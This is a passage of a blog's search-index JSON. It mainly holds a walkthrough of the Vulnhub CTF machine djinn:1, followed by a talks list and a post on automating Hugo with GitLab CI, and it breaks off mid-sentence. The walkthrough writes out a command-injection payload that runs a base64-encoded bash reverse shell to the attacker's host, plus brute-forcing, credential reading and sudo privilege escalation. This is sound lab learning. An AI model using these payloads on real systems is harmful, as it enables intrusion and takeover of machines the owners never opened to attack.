SF:\\x20`\\x20_\\x20\\\\\\x20/\\x20_\\x20\\\\\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\u0026#39;_\\ SF:x20`\\x20_\\x20\\\\\\x20/\\x20_\\x20\\\\\\n\\|\\x20\\|_\\|\\x20\\|\\x20\\(_\\|\\x20\\|\\x20\\| SF:\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\x20__/\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20 SF:\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\x20__/\\n\\x20\\\\____\\|\\\\__,_\\|_\\|\\x20\\|_\\| SF:\\x20\\|_\\|\\\\___\\|\\x20\\x20\\x20\\|_\\|\\x20\\|_\\|_\\|\\x20\\|_\\|\\x20\\|_\\|\\\\___\\|\\ SF:n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\ SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20 SF:\\n\\nLet\u0026#39;s\\x20see\\x20how\\x20good\\x20you\\x20are\\x20with\\x20simple\\x20math SF:s\\nAnswer\\x20my\\x20questions\\x201000\\x20times\\x20and\\x20I\u0026#39;ll\\x20give\\x2 SF:0you\\x20your\\x20gift\\.\\n\\(3,\\x20\u0026#39;-\u0026#39;,\\x208\\)\\n\u0026gt;\\x20\u0026#34;)%r(RPCCheck,1BC,\u0026#34;\\x SF:20\\x20____\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\ SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20_____\\x20_\\x20\\x20\\x20\\x20\\x20\\x20\\x SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20/\\x20___\\|\\x20__\\x20_\\x20_\\ SF:x20__\\x20___\\x20\\x20\\x20___\\x20\\x20\\|_\\x20\\x20\\x20_\\(_\\)_\\x20__\\x20___\\ SF:x20\\x20\\x20___\\x20\\n\\|\\x20\\|\\x20\\x20_\\x20/\\x20_`\\x20\\|\\x20\u0026#39;_\\x20`\\x20_\\ SF:x20\\\\\\x20/\\x20_\\x20\\\\\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\u0026#39;_\\x20`\\x20_\\x SF:20\\\\\\x20/\\x20_\\x20\\\\\\n\\|\\x20\\|_\\|\\x20\\|\\x20\\(_\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\ SF:|\\x20\\|\\x20\\|\\x20\\x20__/\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x2 SF:0\\|\\x20\\|\\x20\\|\\x20\\x20__/\\n\\x20\\\\____\\|\\\\__,_\\|_\\|\\x20\\|_\\|\\x20\\|_\\|\\\\ SF:___\\|\\x20\\x20\\x20\\|_\\|\\x20\\|_\\|_\\|\\x20\\|_\\|\\x20\\|_\\|\\\\___\\|\\n\\x20\\x20\\x SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\ SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20 SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\nLet\u0026#39;s\\x SF:20see\\x20how\\x20good\\x20you\\x20are\\x20with\\x20simple\\x20maths\\nAnswer\\x SF:20my\\x20questions\\x201000\\x20times\\x20and\\x20I\u0026#39;ll\\x20give\\x20you\\x20you SF:r\\x20gift\\.\\n\\(7,\\x20\u0026#39;\\*\u0026#39;,\\x206\\)\\n\u0026gt;\\x20\u0026#34;); MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Unix TRACEROUTE HOP RTT ADDRESS 1 0.66 ms 192.168.14.106 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 102.76 seconds That looks more interesting. So let’s start from the top.\nFTP ftp 192.168.14.106 Connected to 192.168.14.106. 220 (vsFTPd 3.0.3) Name (192.168.14.106:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp\u0026gt; ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt -rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt 226 Directory send OK. ftp\u0026gt; get creds.txt local: creds.txt remote: creds.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for creds.txt (11 bytes). 226 Transfer complete. 11 bytes received in 0.02 secs (0.6338 kB/s) ftp\u0026gt; get game.txt local: game.txt remote: game.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for game.txt (128 bytes). 226 Transfer complete. 128 bytes received in 0.02 secs (7.6252 kB/s) ftp\u0026gt; get message.txt local: message.txt remote: message.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for message.txt (113 bytes). 226 Transfer complete. 113 bytes received in 0.02 secs (7.1573 kB/s) Connect as user anonymous\nno password\nFiles content I replace cat with bat . I like the output and so I create an alias in the .bashrc\nalias cat='bat'\nroot@kali:~/djinn# cat creds.txt ───────┬────────────────────────────────────────────────────────────────────────────────────────────────── │ File: creds.txt ───────┼────────────────────────────────────────────────────────────────────────────────────────────────── 1 │ nitu:81299 ───────┴────────────────────────────────────────────────────────────────────────────────────────────────── root@kali:~/djinn# cat game.txt ───────┬────────────────────────────────────────────────────────────────────────────────────────────────── │ File: game.txt ───────┼────────────────────────────────────────────────────────────────────────────────────────────────── 1 │ oh and I forgot to tell you I\u0026#39;ve setup a game for you on port 1337. See if you can reach to the 2 │ final level and get the prize. ───────┴────────────────────────────────────────────────────────────────────────────────────────────────── root@kali:~/djinn# cat message.txt ───────┬────────────────────────────────────────────────────────────────────────────────────────────────── │ File: message.txt ───────┼────────────────────────────────────────────────────────────────────────────────────────────────── 1 │ @nitish81299 I am going on holidays for few days, please take care of all the work. 2 │ And don\u0026#39;t mess up anything. ───────┴────────────────────────────────────────────────────────────────────────────────────────────────── Port 1337 Opening with netcat:\nnc 192.168.14.106 1337 ____ _____ _ / ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | | _ / _` | \u0026#39;_ ` _ \\ / _ \\ | | | | \u0026#39;_ ` _ \\ / _ \\ | |_| | (_| | | | | | | __/ | | | | | | | | | __/ \\____|\\__,_|_| |_| |_|\\___| |_| |_|_| |_| |_|\\___| Let\u0026#39;s see how good you are with simple maths Answer my questions 1000 times and I\u0026#39;ll give you your gift. (3, \u0026#39;*\u0026#39;, 1) \u0026gt; So we get a math equation to solve here and the message says we need to solve 1000 of them.\nSolve with pwntools A good way to solve such network games is using Python and pwntools .\nInstall pwntools with Python 3 (I use Kali Linux 2019.4): Installing pwntools directly with pip3 ran into an error. The master-branch does not fully support Python 3.\napt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3 Solution mathsolve.py\n#!/usr/bin/env python3 from pwn import * c = remote(\u0026#39;192.168.14.106\u0026#39;,1337) c.recvuntil(\u0026#34;\\n\\n\u0026#34;, drop=True) # Loop 1000 times for i in range(1001): # read from ( to , c.recvuntil(\u0026#34;(\u0026#34;, drop=True) int1 = c.recvuntil(\u0026#34;,\u0026#34;, drop=True) # read from \u0026#39; to , c.recvuntil(\u0026#34;\u0026#39;\u0026#34;, drop=True) mathsym = c.recvuntil(\u0026#34;\u0026#39;\u0026#34;, drop=True) # read from , to ) c.recvuntil(\u0026#34;, \u0026#34;, drop=True) int2 = c.recvuntil(\u0026#34;)\u0026#34;, drop=True) # calculate equation equation = int1+mathsym+int2 print(str(i)+\u0026#34;th answer= \u0026#34;+str(equation)) # send answer c.sendlineafter(\u0026#39;\u0026gt;\u0026#39;,equation) c.interactive() ➜ chmod +x mathsolve.py ➜ ./mathsolve.py ... 999th answer= b\u0026#39;1+6\u0026#39; 1000th answer= b\u0026#39;6*8\u0026#39; [*] Switching to interactive mode Here is your gift, I hope you know what to do with it: 1356, 6784, 3409 [*] Got EOF while reading in interactive Looks like a sequence to port knocking.\nSSH Check ssh port\n➜ nmap -p22 192.168.14.106 PORT STATE SERVICE 22/tcp filtered ssh MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC) Install knockd\n➜ apt install knockd Try to open the ssh port\n➜ knock 192.168.14.106 1356 6784 3409 Check ssh port again\n➜ nmap -p22 192.168.14.106 PORT STATE SERVICE 22/tcp open ssh MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC) So the port is open. I tried to connect with the credentials found on the anonymous ftp login, but wasn’t successful. Damn lot of fun, but still not able to connect.\n➜ hydra -C creds.txt -u 192.168.14.106 ssh [DATA] max 1 task per 1 server, overall 1 task, 1 login try, ~1 try per task [DATA] attacking ssh://192.168.14.106:22/ 1 of 1 target completed, 0 valid passwords found I tried several combinations, with user nitish like mentioned in the message.txt. Loaded a larger wordlist for passwords, but wasn’t successful.\nPort 7331 Accessing http://192.168.14.106:7331 opens a web page. Let’s digg into that.\ngobuster\n➜ gobuster dir -w /usr/share/wordlists/dirbuster/directories.jbrofuzz -u http://192.168.14.106:7331 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.14.106:7331 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directories.jbrofuzz [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2019/12/31 08:18:56 Starting gobuster =============================================================== [ERROR] 2019/12/31 08:18:56 [!] parse http://192.168.14.106:7331/%: invalid URL escape \u0026#34;%\u0026#34; /?? (Status: 200) /genie (Status: 200) /wish (Status: 200) =============================================================== 2019/12/31 08:20:22 Finished With /wish we can execute commands on the webserver and get some response in the black background of the image of /genie.\nTo see it little bit easier, I copied the request as cUrl command from browser devtools:\n➜ curl -L \u0026#39;http://192.168.14.106:7331/wish\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39; \\ --compressed -H \u0026#39;Content-Type: application/x-www-form-urlencoded\u0026#39; \\ -H \u0026#39;Origin: http://192.168.14.106:7331\u0026#39; -H \u0026#39;DNT: 1\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Referer: http://192.168.14.106:7331/wish\u0026#39; -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; \\ -H \u0026#39;Pragma: no-cache\u0026#39; -H \u0026#39;Cache-Control: no-cache\u0026#39; \\ --data \u0026#34;cmd=ls\u0026#34; ... \u0026lt;p\u0026gt; app.py app.pyc static templates \u0026lt;/p\u0026gt; ... Testing with ls / and some other commands, end with:\n\u0026lt;p\u0026gt; Wrong choice of words \u0026lt;/p\u0026gt; I tried several remote shell commands here, but wasn’t successful. Raj Chandel’s Blog gave me the idea to do a base64 conversion of the remote shell.\nSolving it on the commandline without a webservice is possible with curl and some commandlinefu:\n➜ curl \u0026#39;http://192.168.14.106:7331/wish\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39; \\ -H \u0026#39;Accept-Language: en-US,en;q=0.7,de;q=0.3\u0026#39; --compressed \\ -H \u0026#39;Content-Type: application/x-www-form-urlencoded\u0026#39; \\ -H \u0026#39;Origin: http://192.168.14.106:7331\u0026#39; \\ -H \u0026#39;DNT: 1\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; -H \u0026#39;Referer: http://192.168.14.106:7331/wish\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;Pragma: no-cache\u0026#39; -H \u0026#39;Cache-Control: no-cache\u0026#39; \\ --data-urlencode \\ \u0026#34;cmd=echo $(echo \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.14.107/8080 0\u0026gt;\u0026amp;1\u0026#39; | base64) | base64 -d | bash\u0026#34; use --data-urlencode instead of --data Raj takes the remote shell command bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.14.107/8080 0\u0026gt;\u0026amp;1 and encode it through https://www.base64encode.org/ , but we can get the same result with\nCommandline base64 encode\necho \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.14.107/8080 0\u0026gt;\u0026amp;1\u0026#39; | base64 Now let’s connect this on the console. $() runs the command in parantheses first, so this adds the base64 encoded string,\necho $(echo \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.14.107/8080 0\u0026gt;\u0026amp;1\u0026#39; | base64) | base64 -d | bash is the same as:\necho YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA+JjEK | base64 -d | bash but we can easier change IP or port. Switching the curl option from --data to --data-urlencode converts the command into echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA%2BJjEK%20%7C%20base64%20-d%20%7C%20bash.\nBefore running our curl command start the netcat listener:\nnc -nlvp 8080 listening on [any] 8080 ... When we now run the curl command, we get a shell in netcat.\nRemote shell nc -nlvp 8080 listening on [any] 8080 ... connect to [192.168.14.107] from (UNKNOWN) [192.168.14.106] 44802 bash: cannot set terminal process group (740): Inappropriate ioctl for device bash: no job control in this shell www-data@djinn:/opt/80$ python -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@djinn:/opt/80$ ls ls app.py app.pyc static templates www-data@djinn:/opt/80$ cat app.py | grep CREDS cat app.py | grep nit CREDS = \u0026#34;/home/nitish/.dev/creds.txt\u0026#34; www-data@djinn:/opt/80$ cd /home/nitish/.dev cd /home/nitish/.dev www-data@djinn:/home/nitish/.dev$ ls ls creds.txt www-data@djinn:/home/nitish/.dev$ cat creds.txt cat creds.txt nitish:p4ssw0rdStr3r0n9 Get user.txt flag www-data@djinn:/home/nitish/.dev$ su - nitish su - nitish Password: p4ssw0rdStr3r0n9 nitish@djinn:~$ ls ls user.txt nitish@djinn:~$ cat user.txt cat user.txt 10aay8289ptgguy1pvfa73alzusyyx3c nitish@djinn:~$ sudo -l sudo -l Matching Defaults entries for nitish on djinn: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User nitish may run the following commands on djinn: (sam) NOPASSWD: /usr/bin/genie First flag user.txt\nnitish is allowed to run /usr/bin/genie with sudo without password\nThe shell is still not that good, we can use ssh with user nitish and the password above to successfully login. So we get a more stable shell.\nGet root flag ls -al /usr/bin/genie -rwsr-x--- 1 sam nitish 72000 Nov 11 19:09 genie nitish@djinn:~$ genie -e id test genie -e id test uid=1001(nitish) gid=1001(nitish) groups=1001(nitish) nitish@djinn:~$ sudo -u sam genie -e id test sudo -u sam genie -e id test uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare) Check commands like ls /home/sam or bash ended with You are a noob hacker!!, same for everything with -p.\nman genie\nSYNOPSIS genie [-h] [-g] [-p SHELL] [-e EXEC] wish DESCRIPTION genie would complete all your wishes, even the naughty ones. We all dream of getting those crazy privelege escalations, this will even help you acheive that. OPTIONS wish This is the wish you want to make . -g, --god Sometime we all would like to make a wish to god, this option let you make wish directly to God; Though genie can\u0026#39;t gurantee you that your wish will be heard by God, he\u0026#39;s a busy man you know; -p, --shell Well who doesn\u0026#39;t love those. You can get shell. Ex: -p \u0026#34;/bin/sh\u0026#34; -e, --exec Execute command on someone else computer is just too damn fun, but this comes with some restrictions. -cmd You know sometime all you new is a damn CMD, windows I love you. SEE ALSO mzfr.github.io BUGS There are shit loads of bug in this program, it\u0026#39;s all about finding First of all, you have to add a wish at the end of the command, but the wish mustn’t be wish, or you will get an answer like Pass your wish to GOD, he might be able to help you.\nWe’re user sam now\n$ whoami whoami sam Check sudoers\nnitish@djinn:~$ sudo -u sam genie -cmd man sudo -u sam genie -cmd man my man!! $ sudo -l sudo -l Matching Defaults entries for sam on djinn: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User sam may run the following commands on djinn: (root) NOPASSWD: /root/lago Now we need to run /root/lago\nWe get four choices.\nWhat do you want to do ? 1 - Be naughtys 2 - Guess the numbers 3 - Read some damn filess 4 - Works Enter your choice: I ran a grep -ir naughtys .* as user sam and got .pyc as hit. pyc is compiled python code, so maybe we find something about the lago command.\nDouble check with string .pyc shows lots of strings from /root/lago.\nSo running http server and download to Kali:\nOn djinn vm\npython3 -m http.server On Kali\ncurl -O http://192.168.14.106:8000/.pyc pip3 install uncompyle6 uncompyle6 .pyc ... def guessit(): num = randint(1, 101) print \u0026#39;Choose a number between 1 to 100: \u0026#39; s = input(\u0026#39;Enter your number: \u0026#39;) if s == num: system(\u0026#39;/bin/sh\u0026#39;) else: print \u0026#39;Better Luck next time\u0026#39; ... if input == num start a shell sam@djinn:/home/sam$ sudo /root/lago What do you want to do ? 1 - Be naughty 2 - Guess the number 3 - Read some damn files 4 - Work Enter your choice:2 Choose a number between 1 to 100: Enter your number: num # whoami root # bash root@djinn:/home/sam# Use the variable name directly and we got a new shell as root root.flag cd root ./proof.sh _ _ _ _ _ / \\ _ __ ___ __ _ ___(_)_ __ __ _| | | | / _ \\ | \u0026#39;_ ` _ \\ / _` |_ / | \u0026#39;_ \\ / _` | | | | / ___ \\| | | | | | (_| |/ /| | | | | (_| |_|_|_| /_/ \\_\\_| |_| |_|\\__,_/___|_|_| |_|\\__, (_|_|_) |___/ djinn pwned... __________________________________________________________________________ Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc Path: /root Date: Tue Dec 31 23:18:56 IST 2019 Whoami: root __________________________________________________________________________ By @0xmzfr Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-) Links Here can you find other walkthroughs for this VM (they’re describing other routes and details):\nhttps://medium.com/schkn/linux-privilege-escalation-using-text-editors-and-files-part-1-a8373396708d https://medium.com/@prasenjitkantipaul/vulnhub-djinn-1-walkthrough-f874c2e5f0ab https://www.hackingarticles.in/djinn1-vulnhub-walkthrough/ https://lifesfun101.github.io/2019/12/07/Djinn-walkthrough.html ","excerpt":"\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.vulnhub.com/entry/djinn-1,397/\" target=\"_blank\"\u003edjinn:1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is the next machine I want to break in.\u003c/li\u003e\n\u003cli\u003eLevel: Beginner-Intermediate\u003c/li\u003e\n\u003cli\u003eflags: user.txt and root.txt\u003c/li\u003e\n\u003cli\u003eFormat: Virtual Machine (Virtualbox - OVA)\u003c/li\u003e\n\u003cli\u003eOperating System: Linux\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2020/20200101-walkthrough-djinn/","title":"Walkthrough: Vulnhub - Djinn:1"},{"body":"DNUG Connections Day Docker und Kubernetes Basics Docker und Kubernetes Basics Engage UG Kubernetes for HCL Connections Component Pack - Build or Buy? ","excerpt":"\u003ch2 id=\"dnug-connections-day\"\u003eDNUG Connections Day \u003ca href=\"#dnug-connections-day\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2020-DNUGTag-DockerK8sBasics.html\" target=\"_blank\"\u003eDocker und Kubernetes Basics \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2020-DNUGTag-DockerK8sBasics.pdf\" target=\"_blank\"\u003eDocker und Kubernetes Basics \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"engage-ug\"\u003eEngage UG \u003ca href=\"#engage-ug\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/engage-ad02-kubernetes.pdf\" target=\"_blank\"\u003eKubernetes for HCL Connections Component Pack - Build or Buy? \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2020/","title":"Talks 2020"},{"body":"Mid 2018 I switched my blog from Wordpress to Hugo . Main reason was performance and that I can use Asciidoctor to write the posts.\nWhat happened the last 18 months? I stayed with the theme I selected 2018, but I tweaked it a little bit. So I added lunr to implement searching, changed all scripts and fonts from CDN to local (privacy and tracking), updated Bootstrap 3 to 4.\nWorking with Bootstrap was quite fun, I haven’t done a lot of HTML or CSS the last years, but the grid and css classes from Bootstrap are working without checking each change on all browsers and are responsive.\nDaily journal After reading The Unicorn Project I started writing a daily journal with things I learned or figured out during the day. I tried this several times the last years, but never was happy with the result. This time I just use the same setup as my blog (Hugo, Theme and Asciidoctor), but deploy it to a local Docker container, which is started with podman.\nGitlab CI/CD Hugo generates static html pages from Asciidoctor or Markdown sources. The first months I just ran the hugo binary on my local machine and did a rsync of the generated html to my blog and the container.\nUpdating Hugo, or reinstall my Notebook sometimes delayed a blog post. So I decided to automated the process through Gitlab CI/CD.\n.gitmodules I added the theme (which is stored as a seperate git repository) as a submodule (git add submodule …​) to the blog content. .gitmodules can handle complete repository URL, or relative ones. The relative URL are easier to checkout in the pipeline, so I changed the file to\n.gitmodules\n[submodule \u0026#34;themes/stoeps-theme\u0026#34;] path: themes/stoeps-theme url: ../stoeps-theme.git Edit Url and replace with the relative path (I have the theme in the same git group) Creating .gitlab-ci.yml variables: GIT_SUBMODULE_STRATEGY: recursive stages: - build - deploy build: stage: build image: \u0026#34;node:alpine\u0026#34; before_script: - \u0026#39;which curl || ( apk update \u0026amp;\u0026amp; apk add curl)\u0026#39; - \u0026#39;which gem || (apk add ruby)\u0026#39; - curl -L https://github.com/gohugoio/hugo/releases/download/v0.61.0/hugo_0.61.0_Linux-64bit.tar.gz | tar -xz \u0026amp;\u0026amp; mv hugo /usr/local/bin/hugo - npm install - gem install asciidoctor script: - npx gulp build only: refs: - master variables: - $BUILDHTML changes: - content/**/* artifacts: paths: - docs expire_in: 2 hours deploy: image: \u0026#34;debian:buster\u0026#34; stage: deploy before_script: - \u0026#39;which ssh-agent || ( apt-get update -y \u0026amp;\u0026amp; apt-get install openssh-client -y )\u0026#39; - \u0026#39;which rsync || ( apt-get update -y \u0026amp;\u0026amp; apt-get install rsync -y )\u0026#39; - eval $(ssh-agent -s) - echo \u0026#34;$SSH_PRIVATE_KEY\u0026#34; | base64 --decode | tr -d \u0026#39;\\r\u0026#39; | ssh-add - \u0026gt; /dev/null - mkdir -p ~/.ssh - chmod 700 ~/.ssh - ssh-keyscan -t rsa home26617100.1and1-data.host \u0026gt;\u0026gt; ~/.ssh/known_hosts script: - rsync -az docs/ p7594620@home26617100.1and1-data.host:/kunden/homepages/13/d26617100/htdocs/stoeps.de --delete only: refs: - master variables: - $DEPLOYBLOG changes: - content/**/* Clone submodules with the main repository\nTwo stages, one builds html, one deploys the code\nCheck if curl is included in the container, if not install it\nRun build with Gulp (see below)\nStage runs only for master-Branch, if variable BUILDHTML is set and changed files are in the content-tree\nKeep directory docs as artifacts for the next stage\nI created a seperate SSH key just for the synchronisation, it is stored as a variable in the Gitlab project\nStore SSH-Key as variable Create Key\nssh-keygen base64 encode the key and copy to clipboard\nbase64 -i ~/.ssh/id_gitlab |tr -d \u0026#39;\\n\u0026#39; | xclip Syntax is equal to Linux cron, so the setting of this image will run the pipeline at 23:55 UTC every day. Other option could be hourly at 5 minutes past the full hour: 5 * * * *\nI added a scheduler which runs hourly and sets the variables BUILDHTML and DEPLYBLOG, so I can check-in code to gitlab multiple times and the posts will only be build on a scheduled basis.\nJust set the variables to true.\nGulp The article Continuously Deploy a Hugo Site with GitLab CI added Gulp to minify the built HTML. Cool idea and saves me some megabytes. I added css-minify and build the hugo page with:\nnpx gulp build gulpfile.js\nvar gulp: require(\u0026#34;gulp\u0026#34;); var htmlmin: require(\u0026#34;gulp-htmlmin\u0026#34;); var cssmin: require(\u0026#34;gulp-cssmin\u0026#34;); var shell: require(\u0026#34;gulp-shell\u0026#34;); gulp.task(\u0026#34;hugo-build\u0026#34;, shell.task([\u0026#34;hugo\u0026#34;])); gulp.task(\u0026#34;minify-html\u0026#34;, () =\u0026gt; { return gulp.src([\u0026#34;docs/**/*.html\u0026#34;]) .pipe(htmlmin({ collapseWhitespace: true, minifyCSS: true, minifyJS: true, removeComments: true, useShortDoctype: true, })) .pipe(gulp.dest(\u0026#34;./docs\u0026#34;)); }); gulp.task(\u0026#39;minify-css\u0026#39;, () =\u0026gt; { return gulp.src([\u0026#34;docs/**/*.css\u0026#34;]) .pipe(cssmin()) .pipe(gulp.dest(\u0026#34;./docs\u0026#34;)); }); gulp.task(\u0026#34;build\u0026#34;, gulp.series(\u0026#34;hugo-build\u0026#34;, \u0026#34;minify-html\u0026#34;, \u0026#34;minify-css\u0026#34;)); ","excerpt":"\u003cp\u003e\u003ca href=\"https://stoeps.de/archive/2018/2018-07-14-new-blog-engine/\" target=\"_blank\"\u003eMid 2018 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I switched my blog from \u003ca href=\"https://www.wordpress.org\" target=\"_blank\"\u003eWordpress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to \u003ca href=\"https://hugo.io\" target=\"_blank\"\u003eHugo \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Main reason was performance and that I can use \u003ca href=\"https://asciidoctor.org\" target=\"_blank\"\u003eAsciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to write the posts.\u003c/p\u003e\n\u003cp\u003eWhat happened the last 18 months? I stayed with the \u003ca href=\"https://github.com/appernetic/hugo-bootstrap-premium\" target=\"_blank\"\u003etheme \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I selected 2018, but I tweaked it a little bit. So I added \u003ca href=\"https://lunrjs.com/\" target=\"_blank\"\u003e\u003ccode\u003elunr\u003c/code\u003e \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to implement searching, changed all scripts and fonts from CDN to local (privacy and tracking), updated \u003ca href=\"https://getbootstrap.com/\" target=\"_blank\"\u003eBootstrap \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 3 to 4.\u003c/p\u003e\n\u003cp\u003eWorking with Bootstrap was quite fun, I haven’t done a lot of \u003ccode\u003eHTML\u003c/code\u003e or \u003ccode\u003eCSS\u003c/code\u003e the last years, but the grid and css classes from Bootstrap are working without checking each change on all browsers and are responsive.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20191230-automate-hugo/","title":"Automate hugo"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hugo/","title":"Hugo"},{"body":"In my spare time I like doing CTF (Capture the flag) or solving machines posted at Vulnhub . This time I started Christmas vacation with Me and My Girlfriend: 1 .\nExtracting and importing into Vmware Workstation was straight forward, after the start we need to find the 